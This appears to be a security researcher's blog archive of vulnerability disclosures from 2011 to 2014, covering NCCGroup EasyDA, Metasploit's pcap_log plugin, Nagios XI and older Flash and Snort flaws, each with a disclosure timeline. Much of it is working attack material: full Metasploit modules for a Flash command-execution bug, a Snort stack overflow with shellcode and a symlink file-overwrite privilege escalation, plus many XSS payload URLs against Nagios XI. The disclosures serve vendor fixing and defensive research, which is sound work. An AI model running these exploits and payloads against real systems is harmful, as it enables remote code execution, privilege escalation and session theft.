Wednesday, 2 April 2014

0A29-14-1 : NCCGroup EasyDA privilege escalation & credential disclosure vulnerability [0day]

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
_______          ________  ________  _____  _______
\   _  \ _____   \_____  \/   __   \/  |  | \   _  \
/  /_\  \\__  \   /  ____/\____    /   |  |_/  /_\  \
\  \_/   \/ __ \_/       \   /    /    ^   /\  \_/   \
 \_____  (____  /\_______ \ /____/\____   |  \_____  /
       \/     \/         \/            |__|        \/
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

0A29-14-1 : NCCGroup EasyDA privilege escalation & credential
disclosure vulnerability [0day]

Author: 0a29406d9794e4f9b30b3c5d6702c708

twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Description:
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

EasyDA by NCCGroup uses /tmp in an insecure manner.
1) Domain Admin credentials can be obtained by a low-privileged user
2) A low-privileged user can escalate to the user which runs EasyDA

https://github.com/nccgroup/easyda

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Timeline:
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

22 June  2013 - Reported
24 June  2013 - Acknowledged
20 March 2014 - NCCGroup publish an insecure temp priv-esc in Nessus (plugin)
20 March 2014 - 0a2940 remembers about EasyDa......
02 April 2014 - Published (with extra-special ascii :-))

https://www.nccgroup.com/media/481256/ncc00643-technical-advisory-nessus-authenticated-scan-local-privilege-escalation.pdf

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Details:
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

Many problems
e.g.
      cat "$HASHFILE" |cut -d ":" -f 1 >/tmp/user.txt

      cat "$HASHFILE" |cut -d ":" -f 3,4 >/tmp/pass.txt

      paste /tmp/user.txt /tmp/pass.txt >/tmp/userpass.txt

etc.

More info:
https://www.securecoding.cert.org/confluence/display/seccode/FIO21-C.+Do+not+create+temporary+files+in+shared+directories


Monday, 16 July 2012

0A29-12-2 : Metasploit 'pcap_log' plugin privilege escalation vulnerability

UPDATED 29 October 2012

Finessed exploit now included in metasploit -

https://github.com/rapid7/metasploit-framework/blob/master/modules/post/multi/escalate/metasploit_pcaplog.rb

================
0A29-12-2 : Metasploit 'pcap_log' plugin  privilege escalation vulnerability

Author: 0a29406d9794e4f9b30b3c5d6702c708

twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940

================
Description:
================

Metasploit plugin 'pcap_log' is vulnerable to an arbitrary file overwrite bug
which can further be leveraged to insert user-controlled data resulting in
potential escalation of privileges

================
Timeline:
================

16 July 2012 - Reported
16 July 2012 - Acknowledged & fixed by HD Moore
https://github.com/rapid7/metasploit-framework/commit/428a98c1d1d5341d32ffe0ed380d06a327ed2740
16 July 2012 - Public disclosure

================
Details:
================

By default the pcap_log plugin (plugins/pcap_log.rb) logs pcap to a file like
'/tmp/msf3-session_2012-07-16_15-15-35.pcap'. This is of course is
predictable so a simple 'ln' in advance to a privileged file will
result in arbitrary file overwrite. The module has to run as root.

Here's the fun part - by sending packets we can then insert our own
content into any file (surrounded by pcap headers and all
the other packets)

======
Sample PoC (needs work)

modules/post/linux/exploit/metasploit_pcaplog.rb
======

# $Id$
##

##
# ## This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/system'

class Metasploit3 < Msf::Post

    include Msf::Post::Common
    include Msf::Post::File
    include Msf::Post::Linux::System

    def initialize(info={})
        super( update_info( info,
                'Name'          => 'Metasploit plugin "pcap_log" arbirary file overwrite / privilege escalation',
                'Description'   => %q{ Post exploitation module to exploit 0A29-12-2, a vulnerability in metasploit pcap_log plugin.
                            Depending on the file you choose to overwrite, you will need to netcat/telnet etc. the data
                            that you wish to appear in the file.},
          
                'License'       => MSF_LICENSE,
                'Author'        => [ '0a29406d9794e4f9b30b3c5d6702c708'],
                'Version'       => '$Revision$',
                'Platform'      => [ 'linux' ],
                'SessionTypes'  => [ 'shell', 'meterpreter' ],
                'References' =>
                                [
                                        [ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html' ],
                                        [ 'URL', 'https://github.com/rapid7/metasploit-framework/commit/428a98c1d1d5341d32ffe0ed380d06a327ed2740' ]
                                ],
                'DisclosureDate'=> "July 16 2012"

            ))
                register_options([
            OptInt.new('NUMBER', [true, 'Number of seconds to prime /tmp/ with', nil]),
                        OptString.new('FILE', [true, 'File to overwrite with PCAP data', nil]),
                ], self.class)

    end

    def link(t)
        file_part = "%s_%04d-%02d-%02d_%02d-%02d-%02d.pcap" % [
                    "msf3-session", t.year, t.month, t.mday, t.hour, t.min, t.sec
                        ]
                fname = ::File.join("/tmp", file_part)
        retval =  session.shell_command("/bin/ln #{datastore['FILE']} #{fname}")
    end

    # Run Method for when run command is issued
    def run
        for i in 0..(datastore['NUMBER'])
            link(Time.now+i)
        end
        print_status("Set #{datastore['NUMBER']} links.")
    end

    def cleanup
        print_status("Manual cleanup required: rm -f /tmp/msf3-session*")
    end
end

Thursday, 14 June 2012

0A29-12-1 : Cross-Site Scripting vulnerabilities in Nagios XI < 2011R3.0


================
0A29-12-1 : Cross-Site Scripting vulnerabilities in Nagios XI < 2011R3.0

Author: 0a29406d9794e4f9b30b3c5d6702c708

twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940

================
Description:
================

Multiple reflected XSS vulnerabilities exist within Nagios XI < 2011R3.0

Fixes detailed in
http://assets.nagios.com/downloads/nagiosxi/CHANGES-2011.TXT

================
Timeline:
================

16 May 2012 - Reported to Nagios Enterprises
16 May 2012 - Acknowledged
16 May 2012 - Reported fixed
04 June 2012 - Nagios XI 2011R3.0 released
14 June 2012 - Public disclosure

================
Details:
================

Page: /includes/components/graphexplorer/visApi.php
POC: http://site/nagiosxi/includes/components/graphexplorer/visApi.php?type=bar&div=</script><script>alert('0a29')</script>&opt=topalerts

Page: /nagiosxi/perfgraphs/index.php
POC: http://site/nagiosxi/perfgraphs/index.php?view='><script>alert('0a29')</script>&start=&end=&startdate=&enddate=

Wednesday, 16 May 2012

CVE-2008-5499 : modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb


<code>
/*
Compile: mtasc -version 8 -swf Exploit.swf -main -header 800:600:20 Exploit.as
Author:  0a29406d9794e4f9b30b3c5d6702c708 / Unknown / metasploit
PoC:  http://downloads.securityfocus.com/vulnerabilities/exploits/32896.as
*/

import flash.external.ExternalInterface;

class Exploit {

 public function randname(newLength:Number):String{
  var a:String = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
  var alphabet:Array = a.split("");
  var randomLetter:String = "";

  for (var i:Number = 0; i < newLength; i++){
   randomLetter += alphabet[Math.floor(Math.random() * alphabet.length)];
  }

  return randomLetter;
 }

 public function exploit() {
  var path:String = ExternalInterface.call("window.location.href.toString") + randname(6) + ".txt";
  var loadVars:LoadVars = new LoadVars();

  loadVars.onData = function(str:String):Void {
   if (str) {
    if (_global.ASnative(2201, 1)("airappinstaller")) {
     _global.ASnative(2201, 2)("airappinstaller", "; " + str);
    }
   } else {
    // FAIL
   }
  }
  loadVars.load(path);
 }

 public function Exploit() {
  exploit();
 }

 static function main() {
  var ex : Exploit;
  ex = new Exploit();
 }
}

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = GoodRanking

 include Msf::Exploit::Remote::HttpServer::HTML

 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability',
   'Description'    => %q{
     This module exploits a vulnerability in Adobe Flash Player for Linux,
     version  10.0.12.36 and 9.0.151.0 and prior.
     An input validation vulnerability allows command execution when the browser
     loads a SWF file which contains shell metacharacters in the arguments to
     the ActionScript launch method.

     The victim must have Adobe AIR installed for the exploit to work. This module
     was tested against version 10.0.12.36 (10r12_36).
    },
   'License'        => MSF_LICENSE,
   'Author'         =>
    [
     '0a29406d9794e4f9b30b3c5d6702c708', # Metasploit version
    ],
   'References'     =>
    [
     ['CVE', '2008-5499'],
     ['OSVDB', '50796'],
     ['URL', 'http://www.adobe.com/support/security/bulletins/apsb08-24.html'],
     ['URL', 'http://www.securityfocus.com/bid/32896/exploit']
    ],
   'DefaultOptions' =>
    {
     'HTTP::compression' => 'gzip',
     'HTTP::chunked'     => true
    },
   'Platform'       => 'unix', # so unix cmd exec payloads are ok
   'Arch'           => ARCH_CMD,
   'Targets'        =>
    [
     [ 'Automatic', {}],
    ],
   'DisclosureDate' => 'Dec 17 2008',
   'DefaultTarget'  => 0))

 end

 def exploit
  path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2008-5499.swf" )
  fd = File.open( path, "rb" )
  @swf = fd.read(fd.stat.size)
  fd.close

  super
 end

 def on_request_uri(cli, request)
  msg = "#{cli.peerhost.ljust(16)} #{self.shortname}"
  trigger = @swf
  trigger_file = rand_text_alpha(rand(6)+3) + ".swf"

  obj_id = rand_text_alpha(rand(6)+3)

  if request.uri.match(/\.swf/i)
   print_status("#{msg} Sending Exploit SWF")
   send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })
   return
  end

  if request.uri.match(/\.txt/i)
   send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })
   return
  end

  html =  <<-EOS
  <html>
   <head>
   </head>
   <body>
   <center>
   <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="#{obj_id}" width="1" height="1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
    <param name="movie" value="#{get_resource}#{trigger_file}" />
    <embed src="#{get_resource}#{trigger_file}" quality="high" width="1" height="1" name="#{obj_id}" align="middle" allowNetworking="all"
     type="application/x-shockwave-flash"
     pluginspage="http://www.macromedia.com/go/getflashplayer">
    </embed>

   </object>
  </center>

  </body>
  </html>
  EOS

  print_status("#{msg} Sending HTML...")
  send_response(cli, html, { 'Content-Type' => 'text/html' })
 end
end
</code>

CVE-2006-5276 : modules/exploits/linux/ids/snortdcerpc.rb


##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::Capture

def initialize(info = {})
      super(update_info(info,
      'Name'           => 'Snort 2.6.1. DCE/RPC Packet Reassembly Stack Buffer Overflow (Linux x86)',
      'Description'    => %q{
              This exploits the buffer overflow found in Snort 2.6.1 DCE/RPC
              packet processor. This particular module is capable of
              exploiting the flaw on x86 Linux systems that do not have the
              noexec stack option set.
      },
      'Author'         => [
              'Trirat Puttaraksa', #POC
              '0a29406d9794e4f9b30b3c5d6702c708' #module
      ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 14774 $',
      'References'     =>
      [
              [ 'CVE', '2006-5276' ],
              [ 'OSVDB', '32094' ],
              [ 'BID', '22616' ],
              [ 'URL', 'http://iss.net/threats/257.html' ],
              [ 'URL', 'http://sf-freedom.blogspot.com/2007/02/snort-261-dcerpc-preprocessor-remote.html']
      ],
      'Privileged'     => true,
      'Payload'        =>
      {
              'BadChars' => "\x00",
      },
      'Platform'       => 'linux',
      'Targets'        =>
      [
              [ 'Snort 2.6.1 - Redhat 8',
              {
                      'Ret' => 0xbffff120,
                      'Arch' => [ ARCH_X86 ],
                      'Space' => 124,
              }
              ]
      ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Feb 19 2007'
      ))
      register_options([
                      OptString.new('INTERFACE', [true, 'The interface to inject the packet','eth0']),
                      OptAddress.new('DSTIP', [true, 'The destination IP address']),
                      OptAddress.new('SRCIP', [true, 'The source IP address']),

                      ], self.class)

      deregister_options('FILTER','PCAPFILE','SNAPLEN','TIMEOUT')

      end

      def exploit

      begin
       check_pcaprub_loaded

       # SMB packet borrowed from http://www.milw0rm.com/exploits/3391
       # NetBIOS Session Service
       smbreq = "\x00\x00\x04\xab"

       # SMB Header -
       smbreq += "\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8\x00\x00"
       smbreq += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe"
       smbreq += "\x00\x08\x30\x00"

       # Tree Connect AndX Request
       smbreq += "\x04\xa2\x00\x52\x00\x08\x00\x01\x00\x27\x00\x00"
       smbreq += "\x5c\x00\x5c\x00\x49\x00\x4e\x00\x53\x00\x2d\x00\x4b\x00\x49\x00"
       smbreq += "\x52\x00\x41\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00"
       smbreq += "\x3f\x3f\x3f\x3f\x3f\x00"

       # NT Create AndX Request
       smbreq += "\x18\x2f\x00\x96\x00\x00\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00"
       smbreq += "\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
       smbreq += "\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00"
       smbreq += "\x01\x11\x00\x00\x5c\x00\x73\x00\x72\x00\x76\x00\x73\x00\x76\x00"
       smbreq += "\x63\x00\x00\x00"

       # Write AndX Request #1
       smbreq += "\x0e\x2f\x00\xfe\x00\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
       smbreq += "\x00\x48\x00\x00\x00\x48\x00\xb6\x00\x00\x00\x00\x00\x49\x00\xee"
       smbreq += "\x05\x00\x0b\x03\x10\x00\x00\x00\x10\x02\x00\x00\x01\x00\x00\x00"
       smbreq += "\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
       smbreq += "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88"
       smbreq += "\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
       smbreq += "\x2b\x10\x48\x60\x02\x00\x00\x00"

       # Write AndX Request #2
       smbreq += "\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
       smbreq += "\x00\x48\x00\x00\x00\xff\x01\xce\x01\x00\x00\x00\x00\x49\x00\xee"
       smbreq += "\xed\x1e\x94\x7c\x90\x81\xc4\xff\xef\xff\xff\x44"
       smbreq += "\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa9"

       # The following address overwrites RET and points into our shellcode
       smbreq += [target.ret].pack('V')
       smbreq += "\xcc" * 16 #pad
       smbreq += "\x90" * 4  #land
       enc = payload.encoded
       smbreq += enc
       smbreq += "\x90" * (334 - enc.length) #pad

       p = PacketFu::TCPPacket.new
       p.ip_saddr = datastore['SRCIP']
       p.ip_daddr = datastore['DSTIP']
       p.tcp_sport = 139
       p.tcp_flags.ack = 1
       p.tcp_flags.psh = 1
       p.tcp_dport = 139
       p.tcp_win = 3072
       p.payload = smbreq
       p.recalc
       p

       print_status("Sending DCE/RPC packet from #{p.ip_saddr}:#{p.tcp_sport} to #{p.ip_daddr}:#{p.tcp_dport} ")
       open_pcap
       interface = datastore['INTERFACE']
       capture.inject(p.to_s)
       close_pcap

       rescue ::Exception => e
          print_error("Failed: #{e}")
       end
      end

end

Wednesday, 14 December 2011

0A29-11-4 : Privilege escalation vulnerabilities in Nagios XI installer < 2011R1.9

================
Privilege escalation vulnerabilities in Nagios XI installer < 2011R1.9

Author: 0a29406d9794e4f9b30b3c5d6702c708

twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940
================
Description:
================

Multiple privilege escalations exist within Nagios XI installer.

Tested against 2011R1.8, dated October 28, 2011. Fixes detailed in
http://assets.nagios.com/downloads/nagiosxi/CHANGES-2011.TXT (2011R1.9 - 12/07/2011)

================
Timeline:
================

16 November 2011 - Reported to Nagios Enterprises
16 November 2011 - Acknowledged
13 December 2011 - Nagios XI 2011R1.9 released
14 December 2011 - Nagios Enterprises report fixed
14 December 2011 - Public disclosure

================
Details:
================

Vulnerability 1: Arbitrary RPM installation
-----
Files:
    0-yum
    1-prereqs

In certain situations files matching /tmp/epel-release*.rpm , /tmp/rpmforge-release*.rpm
 and /tmp/php-pear-HTML-Template-IT*.rpm will be installed.

e.g. from e0-yum:

if ! rpm -q epel-release &>/dev/null; then
        <snip>
                cd /tmp
        <snip>      
        rpm -Uvh epel-release*.rpm
-----

Vulnerability 2: Arbitrary crontab intallation
-----
Files:
    install-crontab-root
    install-crontab-nagios
    uninstall-crontab-nagios

A malicious user can exploit a race condition to control the root and nagios user's
crontab. By creating the temporary file in advance (to control permissions) an attacker
can insert entries before it is used to update the crontab.

e.g. from install-crontab-root:
---
#!/bin/sh

crontab -l -u root | grep -v "/usr/local/nagiosxi/" > /tmp/root.crontab.new
cat nagiosxi/crontab.root >> /tmp/root.crontab.new

crontab -u root /tmp/root.crontab.new

rm -f /tmp/root.crontab.new

0A29-11-3 : Cross-Site Scripting vulnerabilities in Nagios XI < 2011R1.9

================
Cross-Site Scripting vulnerabilities in Nagios XI < 2011R1.9

Author: 0a29406d9794e4f9b30b3c5d6702c708

twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940
================
Description:
================

Multiple XSS vulnerabilities exist within Nagios XI. It is entirely likely this
list is non-exhaustive, due to the sheer number of issues. Of particular note
is XSS on the login page, and the ability to pass XSS through the login page,
using the redirect parameter, e.g.
http://site/nagiosxi/login.php?redirect=nagiosxi/reports/histogram.php?service="><script>alert("0a29")</script>

Tested against 2011R1.8, dated October 28, 2011. Fixes detailed in
http://assets.nagios.com/downloads/nagiosxi/CHANGES-2011.TXT (2011R1.9 - 12/07/2011)

================
Timeline:
================

16 November 2011 - Reported to Nagios Enterprises
16 November 2011 - Acknowledged
13 December 2011 - Nagios XI 2011R1.9 released
14 December 2011 - Nagios Enterprises report fixed
14 December 2011 - Public disclosure

================
Details:
================

Reflected XSS
-----

Page:        /nagiosxi/login.php
Variables:    -
PoCs:        http://site/nagiosxi/login.php/";alert('0a29');"
Details:    The URL is copied into JavaScript variable 'backend_url' in an unsafe
        manner
        Also affects:
        /nagiosxi/about/index.php
        /nagiosxi/about/index.php
        /nagiosxi/about/main.php
        /nagiosxi/account/main.php
        /nagiosxi/account/notifymethods.php
        /nagiosxi/account/notifymsgs.php
        /nagiosxi/account/notifyprefs.php
        /nagiosxi/account/testnotification.php
        /nagiosxi/help/index.php
        /nagiosxi/help/main.php
        /nagiosxi/includes/components/alertstream/go.php
        /nagiosxi/includes/components/alertstream/index.php
        /nagiosxi/includes/components/hypermap_replay/index.php
        /nagiosxi/includes/components/massacknowledge/mass_ack.php
        /nagiosxi/includes/components/xicore/recurringdowntime.php/
        /nagiosxi/includes/components/xicore/status.php
        /nagiosxi/includes/components/xicore/tac.php
        /nagiosxi/reports/alertheatmap.php
        /nagiosxi/reports/availability.php
        /nagiosxi/reports/eventlog.php
        /nagiosxi/reports/histogram.php
        /nagiosxi/reports/index.php
        /nagiosxi/reports/myreports.php
        /nagiosxi/reports/nagioscorereports.php
        /nagiosxi/reports/notifications.php
        /nagiosxi/reports/statehistory.php
        /nagiosxi/reports/topalertproducers.php
        /nagiosxi/views/index.php
        /nagiosxi/views/main.php

Page:        /nagiosxi/account/
Variables:    xiwindow
PoCs:        http://site/nagiosxi/account/?xiwindow="></iframe><script>alert('0a29')</script>

Page:        /nagiosxi/includes/components/massacknowledge/mass_ack.php
Variables:    -
PoCs:        http://site/nagiosxi/includes/components/massacknowledge/mass_ack.php/'><script>alert("0a29")</script>

Page:        /nagiosxi/includes/components/xicore/status.php
Variables:    hostgroup, style
PoCs:        http://site/nagiosxi/includes/components/xicore/status.php?show=hostgroups&hostgroup='><script>alert("0a29")</script>
        http://site/nagiosxi/includes/components/xicore/status.php?show=hostgroups&hostgroup=all&style=><script>alert("0a29")</script>

Page:        /nagiosxi/includes/components/xicore/recurringdowntime.php
Variables:    -
PoCs:        http://site/nagiosxi/includes/components/xicore/recurringdowntime.php/';}}alert('0a29')</script>


Page:        /nagiosxi/reports/alertheatmap.php
Variables:    height, host, service, width
PoCs:        http://site/nagiosxi/reports/alertheatmap.php?height="><script>alert("0a29")</script>
        http://site/nagiosxi/reports/alertheatmap.php?host="><script>alert("0a29")</script>
        http://site/nagiosxi/reports/alertheatmap.php?service="><script>alert("0a29")</script>
        http://site/nagiosxi/reports/alertheatmap.php?width="><script>alert("0a29")</script>

Page:        /nagiosxi/reports/histogram.php
Variable:    service
PoCs:        http://site/nagiosxi/reports/histogram.php?service="><script>alert("0a29")</script>

Page:        /nagiosxi/reports/notifications.php
Variables:    host, service
PoCs:        http://site/nagiosxi/reports/notifications.php?host="><script>alert("0a29")</script>
        http://site/nagiosxi/reports/notifications.php?service="><script>alert("0a29")</script>

Page:        /nagiosxi/reports/statehistory.php
Variables:    host, service
PoCs:        http://site/nagiosxi/reports/statehistory.php?host="><script>alert("0a29")</script>
        http://site/nagiosxi/reports/statehistory.php?service="><script>alert("0a29")</script>


Stored XSS
-----

Page:        /nagiosxi/reports/myreports.php
Variable:    title
Details:    It is possible to store XSS within 'My Reports', however it is believed this
        is only viewable by the logged-in user.
        1) View a report and save it, e.g.
        http://site/nagiosxi/reports/myreports.php?add=1&title=Availability+Summary&url=%2Fnagiosxi%2Freports%2Favailability.php&meta_s=a%3A0%3A%7B%7D
        2) Name the report with XSS, e.g. "><script>alert("0a29")</script>